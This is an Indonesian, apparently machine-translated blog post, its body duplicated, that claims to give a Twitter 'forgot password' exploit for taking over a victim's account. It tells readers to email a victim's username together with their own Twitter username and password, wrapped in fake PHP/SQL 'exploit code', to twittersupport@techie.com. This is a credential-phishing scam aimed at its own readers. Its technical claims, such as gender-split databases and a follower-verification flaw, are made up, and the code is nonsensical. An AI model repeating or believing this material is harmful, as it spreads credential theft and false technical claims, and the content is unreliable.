Twitter memiliki dua database (satu untuk pria dan satu untuk pengguna perempuan) di mana mereka menyimpan semua informasi dari pengguna mereka, jika Anda ingat email yang Anda gunakan untuk login namun lupa sandi, Anda dapat menggunakan 'Lupa kata sandi Anda?' pilihan, namun jika seperti saya Anda tidak memiliki informasi yang tidak mungkin untuk memulihkan hukum account tersebut.
Jika Anda tahu apa-apa tentang website pemrograman Anda tahu 'Lupa kata sandi Anda?' berada dalam kontak langsung dengan database untuk mengirim permintaan untuk mengambil informasi yang terlupakan untuk Anda, pada dasarnya apa artinya adalah jika Anda bertanya 'database untuk informasi yang login dengan' kode 'hak (dalam kasus kami mengeksploitasi ), itu akan mengirimkan kembali informasi tersebut.
Jadi semua saya harus mencari tahu adalah apa kode dan apa sistem yang mereka digunakan untuk menghubungi database melalui 'Lupa kata sandi Anda?' layanan, setelah beberapa minggu menulis dan menguji kode saya datang dengan orang yang tepat untuk pekerjaan itu dan setelah melakukan sedikit riset saya belajar Twitter menggunakan sesuatu yang mirip dengan layanan email untuk menghubungi database mereka.
Tapi seperti biasa, semuanya tidak semudah tampaknya. Untuk alasan keamanan database diprogram untuk memverifikasi account Anda meminta adalah benar kepunyaan Anda dan tidak seseorang elses sehingga mereka membutuhkan beberapa jenis otentikasi atau verifikasi (thats mengapa mereka mengirimkan link verifikasi ke email Anda saat membuat account Anda atau mengubah password Anda) , untungnya bagi kami Twitter begitu buruk diprogram mereka juga memungkinkan Anda untuk menggunakan teman / pengikut account untuk memverifikasi sendiri (itu kesalahan dalam layanan "Teman Reksa / Pengikut" di mana mereka mengotentikasi account dengan memeriksa jika terkait teman / email pengikut terkait dengan account 'korban'), dengan kata lain, jika orang yang Anda ingin mendapatkan informasi login dari yang mengikuti Anda di Twitter dan mengikuti mereka ... Anda Anda dapat menggunakan akun Anda sendiri untuk memverifikasi mereka (dengan membingungkan database ke dalam berpikir kita memeriksa apakah Anda berdua saling mengikuti satu sama lain daripada tindakan yang benar reseting password mereka dan membuat mereka kirim pada kami) dan mendapatkan login email dan password yang dikirim ke Anda ... tapi korban harus mengikuti Anda dan Anda mereka
CARA MELAKUKANNYA
1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?
Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini
Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2.
2) Di bagian bawah halaman ini saya telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login korban .
Gulir ke bawah ke bagian bawah halaman ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks sehingga Anda dapat mengeditnya.
3) Setelah Anda memiliki kode di suatu tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga hal ke dalamnya, username twitter korban dan otentikasi informasi teman login. Saya akan memberikan contoh langkah demi langkah dengan mencoba memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian mana Anda harus mengedit dan dengan apa:
1. Harus username korban.
2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.
Saat mengedit kode, tidak sengaja menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi pastikan Anda menaruh informasi di dalamnya.
4) Sekarang bahwa Anda memiliki kode eksploitasi diedit dan siap untuk dikirim, kami siap untuk mengirimkannya ke database melalui email, karena bukan email biasa Anda, tetapi email mengeksploitasi kita harus menggunakan Subyek khusus sehingga database tahu bagaimana membaca dalam bahasa pemrograman.
Ke alamat email Anda dan Compose email baru untuk twittersupport@techie.com yang twitters pelanggan layanan email untuk password lupa, dalam salinan Subyek dan paste kode di bawah ini
Setelah Anda mengedit Subjek dan memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar di bawah, saya akan berhitung setiap item:
1. Alamat email dari layanan pelanggan lupa database twitter itu password.
2. Di sinilah Anda memasukkan username korban.
3. Di sinilah Anda memasukkan jenis kelamin korban (seperti yang disebutkan di atas database twitter terbagi dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika mereka adalah laki-laki atau F jika mereka adalah perempuan.
5) Setelah Anda benar ditulis Kepada: dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email. Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database untuk mengirimkan kembali jawaban itu dengan informasi.
Ini harus mengambil dari 12-24 jam tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh dari respon email Anda akan menerima:
(Sorry Yang Bahasa Indonesia Hehehe, Bisa dipaahami gk? Klo gk tanya di comment)
THE EXPLOIT CODE
Jika Anda tahu apa-apa tentang website pemrograman Anda tahu 'Lupa kata sandi Anda?' berada dalam kontak langsung dengan database untuk mengirim permintaan untuk mengambil informasi yang terlupakan untuk Anda, pada dasarnya apa artinya adalah jika Anda bertanya 'database untuk informasi yang login dengan' kode 'hak (dalam kasus kami mengeksploitasi ), itu akan mengirimkan kembali informasi tersebut.
Jadi semua saya harus mencari tahu adalah apa kode dan apa sistem yang mereka digunakan untuk menghubungi database melalui 'Lupa kata sandi Anda?' layanan, setelah beberapa minggu menulis dan menguji kode saya datang dengan orang yang tepat untuk pekerjaan itu dan setelah melakukan sedikit riset saya belajar Twitter menggunakan sesuatu yang mirip dengan layanan email untuk menghubungi database mereka.
Tapi seperti biasa, semuanya tidak semudah tampaknya. Untuk alasan keamanan database diprogram untuk memverifikasi account Anda meminta adalah benar kepunyaan Anda dan tidak seseorang elses sehingga mereka membutuhkan beberapa jenis otentikasi atau verifikasi (thats mengapa mereka mengirimkan link verifikasi ke email Anda saat membuat account Anda atau mengubah password Anda) , untungnya bagi kami Twitter begitu buruk diprogram mereka juga memungkinkan Anda untuk menggunakan teman / pengikut account untuk memverifikasi sendiri (itu kesalahan dalam layanan "Teman Reksa / Pengikut" di mana mereka mengotentikasi account dengan memeriksa jika terkait teman / email pengikut terkait dengan account 'korban'), dengan kata lain, jika orang yang Anda ingin mendapatkan informasi login dari yang mengikuti Anda di Twitter dan mengikuti mereka ... Anda Anda dapat menggunakan akun Anda sendiri untuk memverifikasi mereka (dengan membingungkan database ke dalam berpikir kita memeriksa apakah Anda berdua saling mengikuti satu sama lain daripada tindakan yang benar reseting password mereka dan membuat mereka kirim pada kami) dan mendapatkan login email dan password yang dikirim ke Anda ... tapi korban harus mengikuti Anda dan Anda mereka
CARA MELAKUKANNYA
1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?
Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini
Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2.
2) Di bagian bawah halaman ini saya telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login korban .
Gulir ke bawah ke bagian bawah halaman ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks sehingga Anda dapat mengeditnya.
3) Setelah Anda memiliki kode di suatu tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga hal ke dalamnya, username twitter korban dan otentikasi informasi teman login. Saya akan memberikan contoh langkah demi langkah dengan mencoba memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian mana Anda harus mengedit dan dengan apa:
1. Harus username korban.
2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.
Saat mengedit kode, tidak sengaja menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi pastikan Anda menaruh informasi di dalamnya.
4) Sekarang bahwa Anda memiliki kode eksploitasi diedit dan siap untuk dikirim, kami siap untuk mengirimkannya ke database melalui email, karena bukan email biasa Anda, tetapi email mengeksploitasi kita harus menggunakan Subyek khusus sehingga database tahu bagaimana membaca dalam bahasa pemrograman.
Ke alamat email Anda dan Compose email baru untuk twittersupport@techie.com yang twitters pelanggan layanan email untuk password lupa, dalam salinan Subyek dan paste kode di bawah ini
$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();
Setelah Anda mengedit Subjek dan memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar di bawah, saya akan berhitung setiap item:
1. Alamat email dari layanan pelanggan lupa database twitter itu password.
2. Di sinilah Anda memasukkan username korban.
3. Di sinilah Anda memasukkan jenis kelamin korban (seperti yang disebutkan di atas database twitter terbagi dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika mereka adalah laki-laki atau F jika mereka adalah perempuan.
5) Setelah Anda benar ditulis Kepada: dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email. Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database untuk mengirimkan kembali jawaban itu dengan informasi.
Ini harus mengambil dari 12-24 jam tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh dari respon email Anda akan menerima:
(Sorry Yang Bahasa Indonesia Hehehe, Bisa dipaahami gk? Klo gk tanya di comment)
THE EXPLOIT CODE
twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];
if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."
$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email
session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {
}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) { $num = decrypt() % 33; $tmp = substr($salt, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } mail($email_address, $subject, $message, "Twitter Password Reset Confirmation } /end$
Komentar
Posting Komentar